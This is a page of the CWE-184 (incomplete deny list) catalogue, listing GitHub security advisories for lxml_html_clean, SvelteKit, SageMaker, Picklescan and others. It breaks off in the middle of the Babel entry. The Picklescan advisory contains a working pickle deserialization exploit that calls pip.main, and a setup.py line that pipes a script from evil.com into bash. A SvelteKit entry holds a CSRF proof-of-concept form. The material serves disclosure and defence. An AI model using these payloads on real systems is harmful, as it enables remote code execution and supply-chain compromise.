Common Weakness Enumeration

CWE-184

Allowed

Incomplete List of Disallowed Inputs

Abstraction: Base · Status: Draft

The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

307 vulnerabilities reference this CWE, most recent first.

GHSA-5JFW-GQ64-Q45F

Vulnerability from github – Published: 2024-11-19 21:07 – Updated: 2025-01-14 16:37
VLAI
Summary
HTML Cleaner allows crafted scripts in special contexts like svg or math to pass through
Details

Impact

The HTML Parser in lxml does not properly handle context-switching for special HTML tags such as <svg>, <math> and <noscript>. This behavior deviates from how web browsers parse and interpret such tags. Specifically, content in CSS comments is ignored by lxml_html_clean but may be interpreted differently by web browsers, enabling malicious scripts to bypass the cleaning process. This vulnerability could lead to Cross-Site Scripting (XSS) attacks, compromising the security of users relying on lxml_html_clean in default configuration for sanitizing untrusted HTML content.

Patches

Users employing the HTML cleaner in a security-sensitive context should upgrade to lxml 0.4.0, which addresses this issue.

Workarounds

As a temporary mitigation, users can configure lxml_html_clean with the following settings to prevent the exploitation of this vulnerability: * remove_tags: Specify tags to remove - their content is moved to their parents' tags. * kill_tags: Specify tags to be removed completely. * allow_tags: Restrict the set of permissible tags, excluding context-switching tags like <svg>, <math> and <noscript>.

References

  • https://github.com/fedora-python/lxml_html_clean/pull/19
  • https://github.com/fedora-python/lxml_html_clean/pull/19/commits/c5d816f86eb3707d72a8ecf5f3823e0daa1b3808
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "lxml-html-clean"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-52595"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-79",
      "CWE-83"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-19T21:07:59Z",
    "nvd_published_at": "2024-11-19T22:15:21Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe HTML Parser in lxml does not properly handle context-switching for special HTML tags such as `\u003csvg\u003e`, `\u003cmath\u003e` and `\u003cnoscript\u003e`. This behavior deviates from how web browsers parse and interpret such tags. Specifically, content in CSS comments is ignored by lxml_html_clean but may be interpreted differently by web browsers, enabling malicious scripts to bypass the cleaning process. This vulnerability could lead to Cross-Site Scripting (XSS) attacks, compromising the security of users relying on lxml_html_clean in default configuration for sanitizing untrusted HTML content.\n\n### Patches\n\nUsers employing the HTML cleaner in a security-sensitive context should upgrade to lxml 0.4.0, which addresses this issue.\n\n### Workarounds\n\nAs a temporary mitigation, users can configure lxml_html_clean with the following settings to prevent the exploitation of this vulnerability:\n* `remove_tags`: Specify tags to remove - their content is moved to their parents\u0027 tags.\n* `kill_tags`: Specify tags to be removed completely.\n* `allow_tags`: Restrict the set of permissible tags, excluding context-switching tags like `\u003csvg\u003e`, `\u003cmath\u003e` and `\u003cnoscript\u003e`.\n\n### References\n\n* https://github.com/fedora-python/lxml_html_clean/pull/19\n* https://github.com/fedora-python/lxml_html_clean/pull/19/commits/c5d816f86eb3707d72a8ecf5f3823e0daa1b3808\n",
  "id": "GHSA-5jfw-gq64-q45f",
  "modified": "2025-01-14T16:37:30Z",
  "published": "2024-11-19T21:07:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-5jfw-gq64-q45f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52595"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/pull/19"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/commit/c5d816f86eb3707d72a8ecf5f3823e0daa1b3808"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedora-python/lxml_html_clean"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/lxml-html-clean/PYSEC-2024-160.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "HTML Cleaner allows crafted scripts in special contexts like svg or math to pass through"
}

GHSA-5P75-VC5G-8RV2

Vulnerability from github – Published: 2023-04-04 21:20 – Updated: 2023-06-21 13:48
VLAI
Summary
SvelteKit vulnerable to Cross-Site Request Forgery
Details

Summary

The SvelteKit framework offers developers an option to create simple REST APIs. This is done by defining a +server.js file, containing endpoint handlers for different HTTP methods.

SvelteKit provides out-of-the-box cross-site request forgery (CSRF) protection to it’s users. The protection is implemented at kit/src/runtime/server/respond.js#L52. While the implementation does a sufficient job in mitigating common CSRF attacks, the protection can be bypassed by simply specifying a different Content-Type header value.

Details

The CSRF protection is implemented using the code shown below.

const forbidden =
  // (1)
  request.method === 'POST' &&
  // (2)
  request.headers.get('origin') !== url.origin &&
  // (3)
  is_form_content_type(request);

if (forbidden) {
  // (4)
  const csrf_error = error(403, `Cross-site ${request.method} form submissions are forbidden`);
  if (request.headers.get('accept') === 'application/json') {
    return json(csrf_error.body, { status: csrf_error.status });
  }
  return text(csrf_error.body.message, { status: csrf_error.status });
}

If the incoming request specifies a POST method (1), the protection will compare the server’s origin with the value of the HTTP Origin header (2). A mismatch between these values signals that a potential attack has been detected. The final check is performed on the request’s Content-Type header (3) whether the value is either application/x-www-form-urlencoded or multipart/form-data (kit/src/utils/http.js#L71). If all the previous checks pass, the request will be rejected with an 403 error response (4).

The is_form_content_type validation is not sufficient to mitigate all possible variations of this type of attack. If a CSRF attack is performed with the Content-Type header set to text/plain, the protection will be circumvented and the request will be processed by the endpoint handler.

Impact

If abused, this issue will allow malicious requests to be submitted from third-party domains, which can allow execution of operations within the context of the victim's session, and in extreme scenarios can lead to unauthorized access to users’ accounts.

Remediation

SvelteKit 1.15.1 updates the is_form_content_type function call in the CSRF protection logic to include text/plain.

As additional hardening of the CSRF protection mechanism against potential method overrides, SvelteKit 1.15.1 is now performing validation on PUT, PATCH and DELETE methods as well. This latter hardening is only needed to protect users who have put in some sort of ?_method= override feature themselves in their handle hook, so that the request that resolve sees could be PUT/PATCH/DELETE when the browser issues a POST request.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@sveltejs/kit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.15.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-29003"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-04-04T21:20:47Z",
    "nvd_published_at": "2023-04-04T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe SvelteKit framework offers developers an option to create simple REST APIs. This is done by defining a `+server.js` file, containing endpoint handlers for different HTTP methods.\n\nSvelteKit provides out-of-the-box cross-site request forgery (CSRF) protection to it\u2019s users. The protection is implemented at `kit/src/runtime/server/respond.js#L52`. While the implementation does a sufficient job in mitigating common CSRF attacks, the protection can be bypassed by simply specifying a different `Content-Type` header value.\n\n### Details\nThe CSRF protection is implemented using the code shown below.\n\n```js\nconst forbidden =\n  // (1)\n  request.method === \u0027POST\u0027 \u0026\u0026\n  // (2)\n  request.headers.get(\u0027origin\u0027) !== url.origin \u0026\u0026\n  // (3)\n  is_form_content_type(request);\n\nif (forbidden) {\n  // (4)\n  const csrf_error = error(403, `Cross-site ${request.method} form submissions are forbidden`);\n  if (request.headers.get(\u0027accept\u0027) === \u0027application/json\u0027) {\n    return json(csrf_error.body, { status: csrf_error.status });\n  }\n  return text(csrf_error.body.message, { status: csrf_error.status });\n}\n```\nIf the incoming request specifies a POST method (1), the protection will compare the server\u2019s origin with the value of the HTTP `Origin` header (2). A mismatch between these values signals that a potential attack has been detected. The final check is performed on the request\u2019s `Content-Type` header (3) whether the value is either `application/x-www-form-urlencoded` or `multipart/form-data` (`kit/src/utils/http.js#L71`). If all the previous checks pass, the request will be rejected with an 403 error response (4).\n\nThe `is_form_content_type` validation is not sufficient to mitigate all possible variations of this type of attack. If a CSRF attack is performed with the `Content-Type` header set to `text/plain`, the protection will be circumvented and the request will be processed by the endpoint handler.\n\u003c!--\n### PoC\nTo reproduce this issue, create and run a simple server (by default running on `localhost:3000`) with a POST endpoint handler such as:\n\n```js\nexport async function POST({ request }) {\n    const data = await request.json(); \n    console.log(JSON.stringify(data));\n    return new Response(String(\u0027success\u0027));\n}\n```\n\nNext, save the malicious HTML page:\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003c/head\u003e\n\u003cbody\u003e\n  \u003ch1 id=\"name\"\u003e\u003c/h1\u003e\n  \u003cform action=\"http://localhost:3000/api/test\" method=\"POST\" enctype=\"text/plain\"\u003e\n    \u003cinput type=\"hidden\" name=\"\u0026#123;\u0026quot;name\u0026quot;\u0026#58;\u0026quot;test\" value=\"\u0026quot;\u0026#44;\u0026quot;age\u0026quot;\u0026#58;123\u0026#125;\" /\u003e\n    \u003cinput type=\"submit\" value=\"Submit\" /\u003e\n  \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nin a file named `index.html`. Run another web server, using Python\u2019s built in http.server module (`python -m http.server`, by default running on `localhost:8000`), navigate to [http://localhost:8000/index.html](http://localhost:8000/index.html) and click the `Submit` button. \n\nVerify that the browser\u2019s URL has changed to `localhost:3000` and that the text `success` is displayed on the screen. Additionally, inspect the console of the SvelteKit web server and verify that the request body (`{\"name\":\"test=\",\"age\":123}`) was parsed as valid JSON and printed out. \n\nIt\u0027s worth noting that this attack is possible only for JSON request bodies. Form data sent using `text/plain` will be rejected by the server. \n--\u003e\n### Impact\n\nIf abused, this issue will allow malicious requests to be submitted from third-party domains, which can allow execution of operations within the context of the victim\u0027s session, and in extreme scenarios can lead to unauthorized access to users\u2019 accounts.\n\n### Remediation\n\nSvelteKit 1.15.1 updates the `is_form_content_type` function call in the CSRF protection logic to include `text/plain`.\n\nAs additional hardening of the CSRF protection mechanism against potential method overrides, SvelteKit 1.15.1 is now performing validation on PUT, PATCH and DELETE methods as well. This latter hardening is only needed to protect users who have put in some sort of `?_method=` override feature themselves in their `handle` hook, so that the request that `resolve` sees could be `PUT`/`PATCH`/`DELETE` when the browser issues a `POST` request.",
  "id": "GHSA-5p75-vc5g-8rv2",
  "modified": "2023-06-21T13:48:08Z",
  "published": "2023-04-04T21:20:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sveltejs/kit/security/advisories/GHSA-5p75-vc5g-8rv2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29003"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sveltejs/kit/commit/bb2253d51d00aba2e4353952d4fb0dcde6c77123"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sveltejs/kit"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sveltejs/kit/releases/tag/%40sveltejs%2Fkit%401.15.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SvelteKit vulnerable to Cross-Site Request Forgery"
}

GHSA-5R2P-PJR8-7FH7

Vulnerability from github – Published: 2026-03-05 22:01 – Updated: 2026-03-05 22:01
VLAI
Summary
SageMaker Python SDK replaced eval() with safe parser in JumpStart search functionality
Details

Summary

This advisory addresses the use of the search_hub() function within the SageMaker Python SDK's JumpStart search functionality. An actor with the ability to control query parameters passed to the search_hub() function could potentially provide malformed input that causes the eval() function to execute arbitrary commands, access sensitive data, or compromise the execution environment.

A defense-in-depth enhancement has been implemented to replace code evaluation with safe string operations when processing search query parameters. This enhancement removes the use of eval() from the execution path, replacing it with a safe recursive descent parser. The change was released in SageMaker Python SDK version 3.4.0 on January 23, 2026. This advisory is informational to help customers understand their responsibilities regarding input validation and configuration security under the AWS Shared Responsibility Model.

Impact

Customer applications that pass unsanitized or untrusted input directly to the search_hub() function's query parameter could be prone to Remote Code Execution (RCE), potentially allowing attackers to execute arbitrary commands, access sensitive data, or compromise the execution environment. While the SDK was functioning within the requirements of the shared responsibility model—where input sanitization falls on the customer side—additional safeguards have been added to support secure customer implementations and provide defense-in-depth protection.

Impacted versions: All versions of SageMaker Python SDK prior to 3.4.0

Patches

On January 23, 2026, an enhancement was made to SageMaker Python SDK version 3.4.0, which replaces eval() with a safe recursive descent parser that uses string operations for pattern matching with proper operator precedence and exception handling. We recommend upgrading to version 3.4.0 or later, using the following command:

pip install --upgrade sagemaker>=3.4.0

Customers using forked or derivative code should incorporate the fixes from the referenced pull request.

Workarounds

No workarounds are needed, but as always you should ensure that your application is following security best practices: - Sanitize and validate input to SDK methods to ensure only expected formats are processed - Update to the latest SageMaker Python SDK release on a regular basis - Follow AWS security best practices for SDK configuration and usage - Ensure proper access controls are in place for environments where the SDK is deployed

References

  • Fixed in PR: https://github.com/aws/sagemaker-python-sdk/pull/5497
  • Release: https://pypi.org/project/sagemaker/3.4.0/
  • AWS Shared Responsibility Model: https://aws.amazon.com/compliance/shared-responsibility-model/

If you have any questions or comments about this advisory, contact AWS Security via our vulnerability reporting page or email aws-security@amazon.com. Please do not create a public GitHub issue.

Acknowledgement

We thank Dan Aridor (@daridor9) and the security research community for bringing these customer security considerations to our attention through the coordinated disclosure process and for collaborating on this issue through responsible disclosure practices.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "sagemaker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T22:01:09Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThis advisory addresses the use of the search_hub() function within the SageMaker Python SDK\u0027s JumpStart search functionality. An actor with the ability to control query parameters passed to the search_hub() function could potentially provide malformed input that causes the eval() function to execute arbitrary commands, access sensitive data, or compromise the execution environment.\n\nA defense-in-depth enhancement has been implemented to replace code evaluation with safe string operations when processing search query parameters. This enhancement removes the use of eval() from the execution path, replacing it with a safe recursive descent parser. The change was released in SageMaker Python SDK version 3.4.0 on January 23, 2026. This advisory is informational to help customers understand their responsibilities regarding input validation and configuration security under the [AWS Shared Responsibility Model](https://aws.amazon.com/compliance/shared-responsibility-model/).\n\n\n## Impact\n\nCustomer applications that pass unsanitized or untrusted input directly to the search_hub() function\u0027s query parameter could be prone to Remote Code Execution (RCE), potentially allowing attackers to execute arbitrary commands, access sensitive data, or compromise the\u00a0execution environment. While the SDK was functioning within the requirements of the shared responsibility model\u2014where input sanitization falls on the customer side\u2014additional safeguards have been added to support secure customer implementations and provide defense-in-depth protection.\n\n**Impacted versions:** All versions of SageMaker Python SDK prior to 3.4.0\n\n\n## Patches\n\nOn January 23, 2026, an enhancement was made to SageMaker Python SDK version 3.4.0, which replaces eval() with a safe recursive descent parser that uses string operations for pattern matching with proper operator precedence and exception handling. We recommend upgrading to version 3.4.0 or later, using the following command:\n\n```\npip install --upgrade sagemaker\u003e=3.4.0\n```\nCustomers using forked or derivative code should incorporate the fixes from the referenced pull request.\n\n## Workarounds\n\nNo workarounds are needed, but as always you should ensure that your application is following security best practices:\n- Sanitize and validate input to SDK methods to ensure only expected formats are processed\n- Update to the latest SageMaker Python SDK release on a regular basis\n- Follow AWS security best practices for SDK configuration and usage\n- Ensure proper access controls are in place for environments where the SDK is deployed\n\n\n## References\n\n- Fixed in PR: https://github.com/aws/sagemaker-python-sdk/pull/5497\n- Release: https://pypi.org/project/sagemaker/3.4.0/\n- AWS Shared Responsibility Model: https://aws.amazon.com/compliance/shared-responsibility-model/\n\nIf you have any questions or comments about this advisory, contact AWS Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting/) or email [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n\n\n## Acknowledgement\n\nWe thank Dan Aridor (@daridor9) and the security research community for bringing these customer security considerations to our attention through the coordinated disclosure process and for collaborating on this issue through responsible disclosure practices.",
  "id": "GHSA-5r2p-pjr8-7fh7",
  "modified": "2026-03-05T22:01:09Z",
  "published": "2026-03-05T22:01:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aws/sagemaker-python-sdk/security/advisories/GHSA-5r2p-pjr8-7fh7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/sagemaker-python-sdk/pull/5497"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/sagemaker-python-sdk/commit/e706e578519bd9b92ea44b9b15f872eca5e77ea4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aws/sagemaker-python-sdk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SageMaker Python SDK replaced eval() with safe parser in JumpStart search functionality"
}

GHSA-5VX5-9Q73-WGP4

Vulnerability from github – Published: 2017-10-24 18:33 – Updated: 2023-09-05 21:30
VLAI
Summary
Safemode Gem Has Incomplete List of Disallowed Inputs
Details

rubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "safemode"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-7540"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:17:24Z",
    "nvd_published_at": "2017-07-21T22:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "rubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.",
  "id": "GHSA-5vx5-9q73-wgp4",
  "modified": "2023-09-05T21:30:18Z",
  "published": "2017-10-24T18:33:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7540"
    },
    {
      "type": "WEB",
      "url": "https://github.com/svenfuchs/safemode/pull/23"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/safemode/CVE-2017-7540.yml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/svenfuchs/safemode"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Safemode Gem Has Incomplete List of Disallowed Inputs"
}

GHSA-5XX6-PF4V-CPF2

Vulnerability from github – Published: 2024-07-10 18:32 – Updated: 2025-10-22 00:33
VLAI
Details

ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-5217"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-697"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-10T17:15:12Z",
    "severity": "CRITICAL"
  },
  "details": "ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform.\u00a0The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.",
  "id": "GHSA-5xx6-pf4v-cpf2",
  "modified": "2025-10-22T00:33:04Z",
  "published": "2024-07-10T18:32:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5217"
    },
    {
      "type": "WEB",
      "url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1644293"
    },
    {
      "type": "WEB",
      "url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1648313"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-5217"
    },
    {
      "type": "WEB",
      "url": "https://www.darkreading.com/cloud-security/patchnow-servicenow-critical-rce-bugs-active-exploit"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-655Q-FX9R-782V

Vulnerability from github – Published: 2025-03-03 20:05 – Updated: 2025-04-09 20:38
VLAI
Summary
Picklescan Allows Remote Code Execution via Malicious Pickle File Bypassing Static Analysis
Details

CVE-2025-1716

Summary

An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited to run pip install and fetch a malicious package, enabling remote code execution (RCE) upon package installation.

Details

Pickle’s deserialization process allows execution of arbitrary functions via the reduce method. While Picklescan is designed to detect such exploits, this attack evades detection by leveraging pip.main() as the callable function. Since pip is a legitimate package operation, it may not raise red flags in security scans.

The payload executes the following steps:

  1. During unpickling, it calls pip.main() to install a malicious PyPI package.
  2. The installed package runs arbitrary code via setup.py, entry_points, or post-install hooks.
  3. Execution is silent, with minimal logging to avoid detection.

PoC

Step 1: Create the Malicious Package Host a PyPI package with a malicious setup.py or entry_point.

Example malicious setup.py

from setuptools import setup
import os

os.system("curl -s https://evil.com/payload.sh | bash")  # Executes remote shell script

setup(
    name="rsac-demo-package",
    version="0.1",
    packages=["rsac_demo"],
    install_requires=[],
)

Upload it to PyPI or host on GitHub.

Step 2: Exploit via Pickle

import pickle
import pip

class Exploit:
    def __reduce__(self):
        return pip.main, (
            ['install', 'git+https://github.com/madgetr/rsac-demo-package', '--no-input', '-q', '-q', '-q',
             '--exists-action', 'i', '--isolated'],
        )

malicious_pickle = pickle.dumps(Exploit())

# Simulating deserialization attack
pickle.loads(malicious_pickle)

This installs a malicious package from GitHub or PyPI. The payload runs automatically when unpickled, executing any code inside the installed package leveraging the setup.py file.

Impact

Remote Code Execution (RCE): Any system that deserializes a malicious pickle is compromised. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. Bypasses Picklescan: Security tools may not flag pip.main(), making it harder to detect.

Recommended Fixes

Add "pip": "*" to the list of unsafe globals

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.21"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1716"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-03T20:05:49Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### CVE-2025-1716\n\n### Summary\nAn unsafe deserialization vulnerability in Python\u2019s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited to run pip install and fetch a malicious package, enabling remote code execution (RCE) upon package installation.\n\n### Details\nPickle\u2019s deserialization process allows execution of arbitrary functions via the __reduce__ method. While Picklescan is designed to detect such exploits, this attack evades detection by leveraging pip.main() as the callable function. Since pip is a legitimate package operation, it may not raise red flags in security scans.\n\nThe payload executes the following steps:\n\n1. During unpickling, it calls pip.main() to install a malicious PyPI package.\n2. The installed package runs arbitrary code via setup.py, entry_points, or post-install hooks.\n3. Execution is silent, with minimal logging to avoid detection.\n\n### PoC\n\nStep 1: Create the Malicious Package\nHost a PyPI package with a malicious setup.py or entry_point.\n\nExample malicious `setup.py`\n```\nfrom setuptools import setup\nimport os\n\nos.system(\"curl -s https://evil.com/payload.sh | bash\")  # Executes remote shell script\n\nsetup(\n    name=\"rsac-demo-package\",\n    version=\"0.1\",\n    packages=[\"rsac_demo\"],\n    install_requires=[],\n)\n```\nUpload it to PyPI or host on GitHub.\n\nStep 2: Exploit via Pickle\n```\nimport pickle\nimport pip\n\nclass Exploit:\n    def __reduce__(self):\n        return pip.main, (\n            [\u0027install\u0027, \u0027git+https://github.com/madgetr/rsac-demo-package\u0027, \u0027--no-input\u0027, \u0027-q\u0027, \u0027-q\u0027, \u0027-q\u0027,\n             \u0027--exists-action\u0027, \u0027i\u0027, \u0027--isolated\u0027],\n        )\n\nmalicious_pickle = pickle.dumps(Exploit())\n\n# Simulating deserialization attack\npickle.loads(malicious_pickle)\n```\nThis installs a malicious package from GitHub or PyPI.\nThe payload runs automatically when unpickled, executing any code inside the installed package leveraging the `setup.py` file.\n\n\n### Impact\nRemote Code Execution (RCE): Any system that deserializes a malicious pickle is compromised.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\nBypasses Picklescan: Security tools may not flag pip.main(), making it harder to detect.\n\n### Recommended Fixes\nAdd  `\"pip\": \"*\"` to the list of [unsafe globals](https://github.com/mmaitre314/picklescan/blob/25d753f4b9a27ce141a43df3bf88d731800593d9/src/picklescan/scanner.py#L96)",
  "id": "GHSA-655q-fx9r-782v",
  "modified": "2025-04-09T20:38:31Z",
  "published": "2025-03-03T20:05:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1716"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/78ce704227c51f070c0c5fb4b466d92c62a7aa3d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-18.yaml"
    },
    {
      "type": "WEB",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1716"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Picklescan Allows Remote Code Execution via Malicious Pickle File Bypassing Static Analysis"
}

GHSA-67F9-WF2W-Q22M

Vulnerability from github – Published: 2023-09-05 18:30 – Updated: 2024-04-04 07:29
VLAI
Details

Incomplete List of Disallowed Inputs vulnerability in Bookreen allows Privilege Escalation.This issue affects Bookreen: before 3.0.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-3374"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-05T17:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "Incomplete List of Disallowed Inputs vulnerability in Bookreen allows Privilege Escalation.This issue affects Bookreen: before 3.0.0.\n\n",
  "id": "GHSA-67f9-wf2w-q22m",
  "modified": "2024-04-04T07:29:15Z",
  "published": "2023-09-05T18:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3374"
    },
    {
      "type": "WEB",
      "url": "https://www.usom.gov.tr/bildirim/tr-23-0489"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-67HX-6X53-JW92

Vulnerability from github – Published: 2023-10-16 13:55 – Updated: 2024-04-04 14:26
VLAI
Summary
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
Details

Impact

Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()or path.evaluateTruthy() internal Babel methods.

Known affected plugins are: - @babel/plugin-transform-runtime - @babel/preset-env when using its useBuiltIns option - Any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims, babel-plugin-polyfill-regenerator

